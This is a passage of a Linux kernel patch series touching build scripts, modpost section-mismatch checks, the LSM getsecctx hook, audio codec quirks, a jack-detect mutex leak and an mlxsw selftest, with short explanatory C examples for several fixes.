++	$(if $(findstring 1, $(KBUILD_EXTRA_WARN)),-W)					\
+ 	-o $@
+ 
+ # 'make -i -k' ignores compile errors, and builds as many modules as possible.
+diff --git a/scripts/checkpatch.pl b/scripts/checkpatch.pl
+index 1e5e66ae5a522..ecf4250b0d2d2 100755
+--- a/scripts/checkpatch.pl
++++ b/scripts/checkpatch.pl
+@@ -4971,7 +4971,7 @@ sub process {
+ 				if|for|while|switch|return|case|
+ 				volatile|__volatile__|
+ 				__attribute__|format|__extension__|
+-				asm|__asm__)$/x)
++				asm|__asm__|scoped_guard)$/x)
+ 			{
+ 			# cpp #define statements have non-optional spaces, ie
+ 			# if there is a space between the name and the open
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 32e573943cf03..458b2948b580d 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -135,8 +135,13 @@ gen_btf()
+ 	${OBJCOPY} --only-section=.BTF --set-section-flags .BTF=alloc,readonly \
+ 		--strip-all ${1} ${2} 2>/dev/null
+ 	# Change e_type to ET_REL so that it can be used to link final vmlinux.
+-	# Unlike GNU ld, lld does not allow an ET_EXEC input.
+-	printf '\1' | dd of=${2} conv=notrunc bs=1 seek=16 status=none
++	# GNU ld 2.35+ and lld do not allow an ET_EXEC input.
++	if is_enabled CONFIG_CPU_BIG_ENDIAN; then
++		et_rel='\0\1'
++	else
++		et_rel='\1\0'
++	fi
++	printf "${et_rel}" | dd of=${2} conv=notrunc bs=1 seek=16 status=none
+ }
+ 
+ # Create ${2} .S file with all symbols from the ${1} object file
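
The gen_btf() fix stops hard-coding a little-endian e_type: the two
bytes at offset 16 of the ELF header must be written in the object's own
byte order, hence '\0\1' for big-endian targets and '\1\0' otherwise.
Roughly the same operation in C, reading the EI_DATA identification byte
to pick the order (error handling kept minimal):

    #include <stdio.h>

    #define EI_DATA     5   /* e_ident[] index: data encoding */
    #define ELFDATA2MSB 2   /* big-endian object file */
    #define ET_REL      1

    static int set_et_rel(const char *path)
    {
        unsigned char ident[16];
        unsigned char e_type[2];
        FILE *f = fopen(path, "r+b");

        if (!f)
            return -1;
        if (fread(ident, 1, sizeof(ident), f) != sizeof(ident)) {
            fclose(f);
            return -1;
        }
        if (ident[EI_DATA] == ELFDATA2MSB) {
            e_type[0] = 0;                /* the script's '\0\1' */
            e_type[1] = ET_REL;
        } else {
            e_type[0] = ET_REL;           /* the script's '\1\0' */
            e_type[1] = 0;
        }
        fseek(f, 16, SEEK_SET);           /* e_type follows e_ident */
        fwrite(e_type, 1, sizeof(e_type), f);
        fclose(f);
        return 0;
    }

    int main(int argc, char **argv)
    {
        return argc > 1 ? set_et_rel(argv[1]) : 0;
    }
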
+diff --git a/scripts/mod/modpost.c b/scripts/mod/modpost.c
+index e6be7fc2625fd..686eed37f9781 100644
+--- a/scripts/mod/modpost.c
++++ b/scripts/mod/modpost.c
+@@ -41,6 +41,8 @@ static bool allow_missing_ns_imports;
+ 
+ static bool error_occurred;
+ 
++static bool extra_warn;
++
+ /*
+  * Cut off the warnings when there are too many. This typically occurs when
+  * vmlinux is missing. ('make modules' without building vmlinux.)
+@@ -809,7 +811,7 @@ static void check_section(const char *modname, struct elf_info *elf,
+ #define ALL_INIT_TEXT_SECTIONS \
+ 	".init.text", ".meminit.text"
+ #define ALL_EXIT_TEXT_SECTIONS \
+-	".exit.text", ".memexit.text"
++	".exit.text"
+ 
+ #define ALL_PCI_INIT_SECTIONS	\
+ 	".pci_fixup_early", ".pci_fixup_header", ".pci_fixup_final", \
+@@ -817,23 +819,22 @@ static void check_section(const char *modname, struct elf_info *elf,
+ 	".pci_fixup_resume_early", ".pci_fixup_suspend"
+ 
+ #define ALL_XXXINIT_SECTIONS MEM_INIT_SECTIONS
+-#define ALL_XXXEXIT_SECTIONS MEM_EXIT_SECTIONS
+ 
+ #define ALL_INIT_SECTIONS INIT_SECTIONS, ALL_XXXINIT_SECTIONS
+-#define ALL_EXIT_SECTIONS EXIT_SECTIONS, ALL_XXXEXIT_SECTIONS
++#define ALL_EXIT_SECTIONS EXIT_SECTIONS
+ 
+ #define DATA_SECTIONS ".data", ".data.rel"
+-#define TEXT_SECTIONS ".text", ".text.unlikely", ".sched.text", \
+-		".kprobes.text", ".cpuidle.text", ".noinstr.text"
++#define TEXT_SECTIONS ".text", ".text.*", ".sched.text", \
++		".kprobes.text", ".cpuidle.text", ".noinstr.text", \
++		".ltext", ".ltext.*"
+ #define OTHER_TEXT_SECTIONS ".ref.text", ".head.text", ".spinlock.text", \
+-		".fixup", ".entry.text", ".exception.text", ".text.*", \
++		".fixup", ".entry.text", ".exception.text", \
+ 		".coldtext", ".softirqentry.text"
+ 
+ #define INIT_SECTIONS      ".init.*"
+ #define MEM_INIT_SECTIONS  ".meminit.*"
+ 
+ #define EXIT_SECTIONS      ".exit.*"
+-#define MEM_EXIT_SECTIONS  ".memexit.*"
+ 
+ #define ALL_TEXT_SECTIONS  ALL_INIT_TEXT_SECTIONS, ALL_EXIT_TEXT_SECTIONS, \
+ 		TEXT_SECTIONS, OTHER_TEXT_SECTIONS
+@@ -862,7 +863,6 @@ enum mismatch {
+ 	TEXT_TO_ANY_EXIT,
+ 	DATA_TO_ANY_EXIT,
+ 	XXXINIT_TO_SOME_INIT,
+-	XXXEXIT_TO_SOME_EXIT,
+ 	ANY_INIT_TO_ANY_EXIT,
+ 	ANY_EXIT_TO_ANY_INIT,
+ 	EXPORT_TO_INIT_EXIT,
+@@ -937,12 +937,6 @@ static const struct sectioncheck sectioncheck[] = {
+ 	.bad_tosec = { INIT_SECTIONS, NULL },
+ 	.mismatch = XXXINIT_TO_SOME_INIT,
+ },
+-/* Do not reference exit code/data from memexit code/data */
+-{
+-	.fromsec = { ALL_XXXEXIT_SECTIONS, NULL },
+-	.bad_tosec = { EXIT_SECTIONS, NULL },
+-	.mismatch = XXXEXIT_TO_SOME_EXIT,
+-},
+ /* Do not use exit code/data from init code */
+ {
+ 	.fromsec = { ALL_INIT_SECTIONS, NULL },
+@@ -1085,9 +1079,20 @@ static int secref_whitelist(const struct sectioncheck *mismatch,
+ 				    "*_console")))
+ 		return 0;
+ 
+-	/* symbols in data sections that may refer to meminit/exit sections */
++	/* symbols in data sections that may refer to meminit sections */
+ 	if (match(fromsec, PATTERNS(DATA_SECTIONS)) &&
+-	    match(tosec, PATTERNS(ALL_XXXINIT_SECTIONS, ALL_EXIT_SECTIONS)) &&
++	    match(tosec, PATTERNS(ALL_XXXINIT_SECTIONS)) &&
++	    match(fromsym, PATTERNS("*driver")))
++		return 0;
++
++	/*
++	 * symbols in data sections must not refer to .exit.*, but there are
++	 * quite a few offenders, so hide these unless for W=1 builds until
++	 * these are fixed.
++	 */
++	if (!extra_warn &&
++	    match(fromsec, PATTERNS(DATA_SECTIONS)) &&
++	    match(tosec, PATTERNS(EXIT_SECTIONS)) &&
+ 	    match(fromsym, PATTERNS("*driver")))
+ 		return 0;
+ 
+@@ -1254,7 +1259,6 @@ static void report_sec_mismatch(const char *modname,
+ 	case TEXT_TO_ANY_EXIT:
+ 	case DATA_TO_ANY_EXIT:
+ 	case XXXINIT_TO_SOME_INIT:
+-	case XXXEXIT_TO_SOME_EXIT:
+ 	case ANY_INIT_TO_ANY_EXIT:
+ 	case ANY_EXIT_TO_ANY_INIT:
+ 		warn("%s: section mismatch in reference: %s (section: %s) -> %s (section: %s)\n",
+@@ -2290,7 +2294,7 @@ int main(int argc, char **argv)
+ 	LIST_HEAD(dump_lists);
+ 	struct dump_list *dl, *dl2;
+ 
+-	while ((opt = getopt(argc, argv, "ei:mnT:o:awENd:")) != -1) {
++	while ((opt = getopt(argc, argv, "ei:mnT:o:aWwENd:")) != -1) {
+ 		switch (opt) {
+ 		case 'e':
+ 			external_module = true;
+@@ -2315,6 +2319,9 @@ int main(int argc, char **argv)
+ 		case 'T':
+ 			files_source = optarg;
+ 			break;
++		case 'W':
++			extra_warn = true;
++			break;
+ 		case 'w':
+ 			warn_unresolved = true;
+ 			break;
+diff --git a/scripts/mod/sumversion.c b/scripts/mod/sumversion.c
+index 6bf9caca09684..a72e6cf61a1f0 100644
+--- a/scripts/mod/sumversion.c
++++ b/scripts/mod/sumversion.c
+@@ -326,7 +326,12 @@ static int parse_source_files(const char *objfile, struct md4_ctx *md)
+ 
+ 	/* Sum all files in the same dir or subdirs. */
+ 	while ((line = get_line(&pos))) {
+-		char* p = line;
++		char* p;
++
++		/* trim the leading spaces away */
++		while (isspace(*line))
++			line++;
++		p = line;
+ 
+ 		if (strncmp(line, "source_", sizeof("source_")-1) == 0) {
+ 			p = strrchr(line, ' ');
+diff --git a/security/apparmor/include/lib.h b/security/apparmor/include/lib.h
+index f42359f58eb58..d468c8b90298d 100644
+--- a/security/apparmor/include/lib.h
++++ b/security/apparmor/include/lib.h
+@@ -226,7 +226,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+  */
+ #define fn_label_build(L, P, GFP, FN)					\
+ ({									\
+-	__label__ __cleanup, __done;					\
++	__label__ __do_cleanup, __done;					\
+ 	struct aa_label *__new_;					\
+ 									\
+ 	if ((L)->size > 1) {						\
+@@ -244,7 +244,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+ 			__new_ = (FN);					\
+ 			AA_BUG(!__new_);				\
+ 			if (IS_ERR(__new_))				\
+-				goto __cleanup;				\
++				goto __do_cleanup;			\
+ 			__lvec[__j++] = __new_;				\
+ 		}							\
+ 		for (__j = __count = 0; __j < (L)->size; __j++)		\
+@@ -266,7 +266,7 @@ void aa_policy_destroy(struct aa_policy *policy);
+ 			vec_cleanup(profile, __pvec, __count);		\
+ 		} else							\
+ 			__new_ = NULL;					\
+-__cleanup:								\
++__do_cleanup:								\
+ 		vec_cleanup(label, __lvec, (L)->size);			\
+ 	} else {							\
+ 		(P) = labels_profile(L);				\
+diff --git a/security/security.c b/security/security.c
+index fc15b963e1028..1b504c296551c 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -2186,7 +2186,19 @@ EXPORT_SYMBOL(security_inode_setsecctx);
+ 
+ int security_inode_getsecctx(struct inode *inode, void **ctx, u32 *ctxlen)
+ {
+-	return call_int_hook(inode_getsecctx, -EOPNOTSUPP, inode, ctx, ctxlen);
++	struct security_hook_list *hp;
++	int rc;
++
++	/*
++	 * Only one module will provide a security context.
++	 */
++	hlist_for_each_entry(hp, &security_hook_heads.inode_getsecctx, list) {
++		rc = hp->hook.inode_getsecctx(inode, ctx, ctxlen);
++		if (rc != LSM_RET_DEFAULT(inode_getsecctx))
++			return rc;
++	}
++
++	return LSM_RET_DEFAULT(inode_getsecctx);
+ }
+ EXPORT_SYMBOL(security_inode_getsecctx);
+ 
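
security_inode_getsecctx() previously went through call_int_hook(),
whose early-exit rule let a stacked LSM that does not implement the hook
get in the way of the one that does; the fix walks the hook list by hand
and returns the first result that differs from the -EOPNOTSUPP default,
success included. The shape of that walk, reduced to plain function
pointers with invented module names:

    #include <stdio.h>

    #define RET_DEFAULT (-95)   /* -EOPNOTSUPP */

    typedef int (*getsecctx_fn)(void);

    static int lsm_a(void) { return RET_DEFAULT; }  /* not implemented */
    static int lsm_b(void) { return 0; }            /* provides a context */

    static getsecctx_fn hooks[] = { lsm_a, lsm_b };

    static int security_inode_getsecctx(void)
    {
        unsigned int i;

        for (i = 0; i < sizeof(hooks) / sizeof(hooks[0]); i++) {
            int rc = hooks[i]();

            /* only one module will provide a security context */
            if (rc != RET_DEFAULT)
                return rc;
        }
        return RET_DEFAULT;
    }

    int main(void)
    {
        printf("rc = %d\n", security_inode_getsecctx());  /* rc = 0 */
        return 0;
    }
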
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index e8819e8a98763..e8209178d87bb 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -344,6 +344,7 @@ enum {
+ 	CXT_FIXUP_HP_ZBOOK_MUTE_LED,
+ 	CXT_FIXUP_HEADSET_MIC,
+ 	CXT_FIXUP_HP_MIC_NO_PRESENCE,
++	CXT_PINCFG_SWS_JS201D,
+ };
+ 
+ /* for hda_fixup_thinkpad_acpi() */
+@@ -841,6 +842,17 @@ static const struct hda_pintbl cxt_pincfg_lemote[] = {
+ 	{}
+ };
+ 
++/* SuoWoSi/South-holding JS201D with sn6140 */
++static const struct hda_pintbl cxt_pincfg_sws_js201d[] = {
++	{ 0x16, 0x03211040 }, /* hp out */
++	{ 0x17, 0x91170110 }, /* SPK/Class_D */
++	{ 0x18, 0x95a70130 }, /* Internal mic */
++	{ 0x19, 0x03a11020 }, /* Headset Mic */
++	{ 0x1a, 0x40f001f0 }, /* Not used */
++	{ 0x21, 0x40f001f0 }, /* Not used */
++	{}
++};
++
+ static const struct hda_fixup cxt_fixups[] = {
+ 	[CXT_PINCFG_LENOVO_X200] = {
+ 		.type = HDA_FIXUP_PINS,
+@@ -996,6 +1008,10 @@ static const struct hda_fixup cxt_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = CXT_FIXUP_HEADSET_MIC,
+ 	},
++	[CXT_PINCFG_SWS_JS201D] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = cxt_pincfg_sws_js201d,
++	},
+ };
+ 
+ static const struct snd_pci_quirk cxt5045_fixups[] = {
+@@ -1069,6 +1085,7 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8457, "HP Z2 G4 mini", CXT_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x8458, "HP Z2 G4 mini premium", CXT_FIXUP_HP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x138d, "Asus", CXT_FIXUP_HEADPHONE_MIC_PIN),
++	SND_PCI_QUIRK(0x14f1, 0x0265, "SWS JS201D", CXT_PINCFG_SWS_JS201D),
+ 	SND_PCI_QUIRK(0x152d, 0x0833, "OLPC XO-1.5", CXT_FIXUP_OLPC_XO),
+ 	SND_PCI_QUIRK(0x17aa, 0x20f2, "Lenovo T400", CXT_PINCFG_LENOVO_TP410),
+ 	SND_PCI_QUIRK(0x17aa, 0x215e, "Lenovo T410", CXT_PINCFG_LENOVO_TP410),
+@@ -1109,6 +1126,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_HP_ZBOOK_MUTE_LED, .name = "hp-zbook-mute-led" },
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
+ 	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
++	{ .id = CXT_PINCFG_SWS_JS201D, .name = "sws-js201d" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 627899959ffe8..e41316e2e9833 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -1371,6 +1371,7 @@ void dolphin_fixups(struct hda_codec *codec, const struct hda_fixup *fix, int ac
+ 		spec->scodecs[CS8409_CODEC1] = &dolphin_cs42l42_1;
+ 		spec->scodecs[CS8409_CODEC1]->codec = codec;
+ 		spec->num_scodecs = 2;
++		spec->gen.suppress_vmaster = 1;
+ 
+ 		codec->patch_ops = cs8409_dolphin_patch_ops;
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 62f2137044923..92a656fb53212 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9377,7 +9377,7 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = cs35l41_fixup_i2c_two,
+ 		.chained = true,
+-		.chain_id = ALC269_FIXUP_THINKPAD_ACPI,
++		.chain_id = ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK,
+ 	},
+ 	[ALC245_FIXUP_HP_MUTE_LED_COEFBIT] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9392,6 +9392,8 @@ static const struct hda_fixup alc269_fixups[] = {
+ 	[ALC287_FIXUP_THINKPAD_I2S_SPK] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc287_fixup_bind_dacs,
++		.chained = true,
++		.chain_id = ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK,
+ 	},
+ 	[ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD] = {
+ 		.type = HDA_FIXUP_FUNC,
+@@ -9431,6 +9433,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1025, 0x1247, "Acer vCopperbox", ALC269VC_FIXUP_ACER_VCOPPERBOX_PINS),
+ 	SND_PCI_QUIRK(0x1025, 0x1248, "Acer Veriton N4660G", ALC269VC_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x1269, "Acer SWIFT SF314-54", ALC256_FIXUP_ACER_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1025, 0x126a, "Acer Swift SF114-32", ALC256_FIXUP_ACER_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1025, 0x128f, "Acer Veriton Z6860G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x1290, "Acer Veriton Z4860G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1025, 0x1291, "Acer Veriton Z4660G", ALC286_FIXUP_ACER_AIO_HEADSET_MIC),
+@@ -9617,6 +9620,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8786, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8787, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8788, "HP OMEN 15", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x87b7, "HP Laptop 14-fq0xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87c8, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e5, "HP ProBook 440 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87e7, "HP ProBook 450 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+@@ -9686,6 +9690,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b0f, "HP Elite mt645 G7 Mobile Thin Client U81", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9693,6 +9698,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b45, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b46, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b59, "HP Elite mt645 G7 Mobile Thin Client U89", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b63, "HP Elite Dragonfly 13.5 inch G4", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -9722,6 +9728,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c96, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c97, "HP ZBook", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8ca1, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca2, "HP ZBook Power", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+@@ -10049,6 +10057,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
++	SND_PCI_QUIRK(0x2782, 0x1707, "Vaio VJFE-ADL", ALC298_FIXUP_SPK_VOLUME),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 808d002826233..28da4e1858d7e 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -241,6 +241,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82YM"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "83AS"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -297,6 +304,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 15 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Micro-Star International Co., Ltd."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Bravo 15 C7VF"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index fd3dca08460ba..844d14d4c9a51 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -3288,6 +3288,7 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 				    report, SND_JACK_HEADPHONE);
+ 		snd_soc_jack_report(rt5645->mic_jack,
+ 				    report, SND_JACK_MICROPHONE);
++		mutex_unlock(&rt5645->jd_mutex);
+ 		return;
+ 	case 4:
+ 		val = snd_soc_component_read(rt5645->component, RT5645_A_JD_CTRL1) & 0x0020;
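
The rt5645 change fixes a classic early-return lock leak: the case-2
path of the jack-detect worker reported the jack state and returned
while still holding jd_mutex. Reduced to its essentials with
hypothetical names; every exit from the locked region must drop the
mutex:

    #include <pthread.h>

    static pthread_mutex_t jd_mutex = PTHREAD_MUTEX_INITIALIZER;

    static int handle_jack_event(int btn_type)
    {
        pthread_mutex_lock(&jd_mutex);

        if (btn_type == 2) {
            /* report and bail out: unlock on this path too */
            pthread_mutex_unlock(&jd_mutex);
            return 0;
        }

        /* ... other button types handled here ... */
        pthread_mutex_unlock(&jd_mutex);
        return 0;
    }

    int main(void)
    {
        return handle_jack_event(2);
    }
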
+diff --git a/sound/soc/codecs/wcd938x.c b/sound/soc/codecs/wcd938x.c
+index a2abd1a111612..e80be4e4fa8b4 100644
+--- a/sound/soc/codecs/wcd938x.c
++++ b/sound/soc/codecs/wcd938x.c
+@@ -3588,7 +3588,7 @@ static int wcd938x_probe(struct platform_device *pdev)
+ 	ret = wcd938x_populate_dt_data(wcd938x, dev);
+ 	if (ret) {
+ 		dev_err(dev, "%s: Fail to obtain platform data\n", __func__);
+-		return -EINVAL;
++		return ret;
+ 	}
+ 
+ 	ret = wcd938x_add_slave_components(wcd938x, dev, &match);
+diff --git a/tools/arch/x86/include/asm/rmwcc.h b/tools/arch/x86/include/asm/rmwcc.h
+index 11ff975242cac..e2ff22b379a44 100644
+--- a/tools/arch/x86/include/asm/rmwcc.h
++++ b/tools/arch/x86/include/asm/rmwcc.h
+@@ -4,7 +4,7 @@
+ 
+ #define __GEN_RMWcc(fullop, var, cc, ...)				\
+ do {									\
+-	asm_volatile_goto (fullop "; j" cc " %l[cc_label]"		\
++	asm goto (fullop "; j" cc " %l[cc_label]"		\
+ 			: : "m" (var), ## __VA_ARGS__ 			\
+ 			: "memory" : cc_label);				\
+ 	return 0;							\
+diff --git a/tools/include/linux/compiler_types.h b/tools/include/linux/compiler_types.h
+index 1bdd834bdd571..d09f9dc172a48 100644
+--- a/tools/include/linux/compiler_types.h
++++ b/tools/include/linux/compiler_types.h
+@@ -36,8 +36,8 @@
+ #include <linux/compiler-gcc.h>
+ #endif
+ 
+-#ifndef asm_volatile_goto
+-#define asm_volatile_goto(x...) asm goto(x)
++#ifndef asm_goto_output
++#define asm_goto_output(x...) asm goto(x)
+ #endif
+ 
+ #endif /* __LINUX_COMPILER_TYPES_H */
+diff --git a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+index 7bf56ea161e35..616d3581419ca 100755
+--- a/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
++++ b/tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh
+@@ -11,7 +11,7 @@ ALL_TESTS="single_mask_test identical_filters_test two_masks_test \
+ 	multiple_masks_test ctcam_edge_cases_test delta_simple_test \
+ 	delta_two_masks_one_key_test delta_simple_rehash_test \
+ 	bloom_simple_test bloom_complex_test bloom_delta_test \
+-	max_erp_entries_test"
++	max_erp_entries_test max_group_size_test"
+ NUM_NETIFS=2
+ source $lib_dir/lib.sh
+ source $lib_dir/tc_common.sh
+@@ -1033,6 +1033,60 @@ max_erp_entries_test()
+ 		"max chain $chain_failed, mask $mask_failed"
+ }
+ 
++max_group_size_test()
++{
++	# The number of ACLs in an ACL group is limited. Once the maximum
++	# number of ACLs has been reached, filters cannot be added. This test
++	# verifies that when this limit is reached, insertion fails without
++	# crashing.
++
++	RET=0
++
++	local num_acls=32
++	local max_size
++	local ret
++
++	if [[ "$tcflags" != "skip_sw" ]]; then
++		return 0;
++	fi
++
++	for ((i=1; i < $num_acls; i++)); do
++		if [[ $(( i % 2 )) == 1 ]]; then
++			tc filter add dev $h2 ingress pref $i proto ipv4 \
++				flower $tcflags dst_ip 198.51.100.1/32 \
++				ip_proto tcp tcp_flags 0x01/0x01 \
++				action drop &> /dev/null
++		else
++			tc filter add dev $h2 ingress pref $i proto ipv6 \
++				flower $tcflags dst_ip 2001:db8:1::1/128 \
++				action drop &> /dev/null
++		fi
++
++		ret=$?
++		[[ $ret -ne 0 ]] && max_size=$((i - 1)) && break
++	done
++
++	# We expect to exceed the maximum number of ACLs in a group, so that
++	# insertion eventually fails. Otherwise, the test should be adjusted to
++	# add more filters.
++	check_fail $ret "expected to exceed number of ACLs in a group"
++
++	for ((; i >= 1; i--)); do
++		if [[ $(( i % 2 )) == 1 ]]; then
++			tc filter del dev $h2 ingress pref $i proto ipv4 \
++				flower $tcflags dst_ip 198.51.100.1/32 \
